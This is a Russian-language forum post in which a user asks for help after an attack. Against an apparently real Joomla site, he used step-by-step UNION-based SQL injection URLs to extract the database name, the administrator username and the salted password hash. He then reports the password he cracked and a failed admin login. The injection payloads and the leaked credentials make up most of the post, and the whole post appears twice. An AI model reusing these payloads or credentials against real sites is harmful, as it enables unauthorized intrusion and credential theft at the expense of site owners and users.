Cmexo3aBp
20.06.2012, 15:01
Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.
Есть пациент:
index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:
index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20concat(0x7e,0x2 7,unhex(Hex(cast(database()%20as%20char))),0x27,0x 7e)--+a
Узнаю что название базы данных - ipenza_giperion
Далее вытаскиваем логин администратора следующим образом:
index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20(select%20conca t(0x7e,0x27,unhex(Hex(cast(jos_users.username%20as %20char))),0x27,0x7e)%20from%20`ipenza_giperion`.j os_users%20Order%20by%20username%20limit%200,1)%20--+a
Узнаю что он у нас оказывается: Trav
Далее вытаскиваем пасс ( он вроде как должен быть в хэше)
/index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20(select%20conca t(0x7e,0x27,unhex(Hex(cast(jos_users.password%20as %20char))),0x27,0x7e)%20from%20`ipenza_giperion`.j os_users%20Order%20by%20username%20limit%200,1)%20--+a#
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM
После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...
Итак что имеем:
Логин Администратора: Trav
Пароль Администратора: 489341282
Заходим в http:///administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....
Вот где я ошибся ?
Есть пациент:
index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:
index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20concat(0x7e,0x2 7,unhex(Hex(cast(database()%20as%20char))),0x27,0x 7e)--+a
Узнаю что название базы данных - ipenza_giperion
Далее вытаскиваем логин администратора следующим образом:
index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20(select%20conca t(0x7e,0x27,unhex(Hex(cast(jos_users.username%20as %20char))),0x27,0x7e)%20from%20`ipenza_giperion`.j os_users%20Order%20by%20username%20limit%200,1)%20--+a
Узнаю что он у нас оказывается: Trav
Далее вытаскиваем пасс ( он вроде как должен быть в хэше)
/index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20(select%20conca t(0x7e,0x27,unhex(Hex(cast(jos_users.password%20as %20char))),0x27,0x7e)%20from%20`ipenza_giperion`.j os_users%20Order%20by%20username%20limit%200,1)%20--+a#
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM
После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...
Итак что имеем:
Логин Администратора: Trav
Пароль Администратора: 489341282
Заходим в http:///administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....
Вот где я ошибся ?